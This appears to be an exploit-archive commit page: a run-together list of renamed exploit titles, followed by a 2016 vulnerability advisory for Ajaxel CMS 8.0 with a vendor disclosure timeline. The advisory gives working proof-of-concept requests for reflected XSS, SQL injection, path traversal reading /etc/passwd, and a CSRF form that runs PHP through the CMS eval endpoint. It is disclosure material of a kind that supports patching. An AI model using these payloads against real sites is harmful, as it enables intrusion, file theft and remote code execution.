01664c67b8
11 new exploits JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7 JITed egg-hunter stage-0 shellcode Adjusted universal for XP/Vista/Windows 7 BlazeDVD 5.1- (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7 BlazeDVD 5.1 - (.plf) Stack Buffer Overflow PoC Exploit (Windows 7 ALSR/DEP Bypass) Winamp 5.572 - Local BoF Exploit (Win7 ASLR and DEP Bypass) Winamp 5.572 - Local BoF Exploit (Windows 7 ASLR and DEP Bypass) RM Downloader 3.1.3 - Local SEH Exploit (Win7 ASLR and DEP Bypass) RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR and DEP Bypass) UFO: Alien Invasion 2.2.1 - BoF Exploit (Win7 ASLR and DEP Bypass) UFO: Alien Invasion 2.2.1 - BoF Exploit (Windows 7 ASLR and DEP Bypass) The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Win7 + ASLR Bypass) The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows 7 + ASLR Bypass) Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) Mozilla Firefox 3.6.16 - mChannel Object Use After Free Exploit (Windows 7) QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS GNU Bash - Environment Variable Command Injection (ShellShock) Bash - Environment Variables Code Injection Exploit (ShellShock) GNU Bash - Environment Variable Command Injection (Shellshock) Bash - Environment Variables Code Injection Exploit (Shellshock) OpenVPN 2.2.29 - ShellShock Exploit OpenVPN 2.2.29 - Shellshock Exploit Bash - CGI RCE Shellshock Exploit (Metasploit) Bash CGI - RCE Shellshock Exploit (Metasploit) PHP 5.x (< 5.6.2) - Shellshock Exploit (Bypass disable_functions) PHP 5.x (< 5.6.2) - Bypass disable_functions (Shellshock Exploit) OSSEC 2.8 - Privilege Escalation OSSEC 2.8 - hosts.deny Privilege Escalation ShellShock dhclient Bash Environment Variable Command Injection PoC dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock) OSSEC 2.7 <= 2.8.1 - Local Root Escalation OSSEC 2.7 <= 2.8.1 - _diff_ Command Local Root Escalation Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) #2 Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2) BigTree CMS Cross Site Request Forgery Vulnerability Advantech Switch Bash Environment Variable Code Injection (Shellshock) Advantech Switch - Bash Environment Variable Code Injection (Shellshock) KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7) KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10) KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7) KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10) Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes Ajaxel CMS 8.0 - Multiple Vulnerabilities i.FTP 2.21 - Host Address / URL Field SEH Exploit Dell SonicWall Scrutinizer <= 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution ZeewaysCMS - Multiple Vulnerabilities ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2) RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC ImageMagick Delegate Arbitrary Command Execution Ruby on Rails Development Web Console (v2) Code Execution
69 lines
1.9 KiB
Text
Executable file
69 lines
1.9 KiB
Text
Executable file
Ajaxel CMS 8.0 Multiple Vulnerabilities
|
|
|
|
Vendor: Ajaxel
|
|
Product web page: http://www.ajaxel.com
|
|
Affected version: 8.0 and below
|
|
|
|
Summary: Ajaxel CMS is very simple ajaxified CMS and framework
|
|
for any project needs.
|
|
|
|
Desc: Ajaxel CMS version 8.0 and below suffers from multiple
|
|
vulnerabilities inlcuding LFI, XSS, SQL injection and remote
|
|
code execution via CSRF.
|
|
|
|
Tested on: Apache 2.4.10
|
|
MySQL 5.5.46
|
|
|
|
Vendor status:
|
|
[13.04.2016] Vulnerabilities discovered.
|
|
[14.04.2016] Vendor contacted.
|
|
[18.04.2016] Vendor releases patch for version 8.0 to address these issues.
|
|
[05.05.2016] Public security advisory released.
|
|
|
|
Vulnerability discovered by Krzysztof 'DizzyDuck' Kosinski
|
|
[dizzyduck_at_zeroscience.mk]
|
|
|
|
|
|
1. Reflected XSS:
|
|
-----------------
|
|
|
|
GET /cmsj9bwp'-alert(1)-'xvjry=mods/ HTTP/1.1
|
|
Host: 192.168.10.5
|
|
|
|
HTTP/1.0 404 Not Found
|
|
...
|
|
...var Conf={LANG:'en', TPL:'default', DEVICE:'pc', SESSION_LIFETIME:7200,
|
|
USER_ID:1, URL_EXT:'', HTTP_EXT:'/', FTP_EXT:'/',
|
|
REFERER:'/cmsj9bwp'-alert(1)-'xvjry=mods', VERSION:8.0,
|
|
URL_KEY_ADMIN:'cms',...
|
|
|
|
|
|
2. SQL Injection:
|
|
-----------------
|
|
|
|
http://192.168.10.5/cms=mods/tab=ai?mods_ai_tab_ai-submitted=1&f=<SQLi>
|
|
|
|
|
|
3. Local File Disclosure:
|
|
-------------------------
|
|
|
|
http://192.168.10.5/?window&cms=templates&popup=1&file_folder=cms&folder=&file=../../../../../../../../../../../../etc/passwd
|
|
|
|
|
|
4. Cross-Site Request Forgery - RCE PoC:
|
|
----------------------------------------
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://192.168.10.5/cms=settings_eval_tab/tab=eval/load"
|
|
method="POST">
|
|
<input type="hidden" name="data[eval]"
|
|
value="phpinfo();" />
|
|
<input type="hidden" name="a" value="eval" />
|
|
<input type="hidden"
|
|
name="settings_eval_tab_eval-submitted" value="1" />
|
|
<input type="submit" value="Execute" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|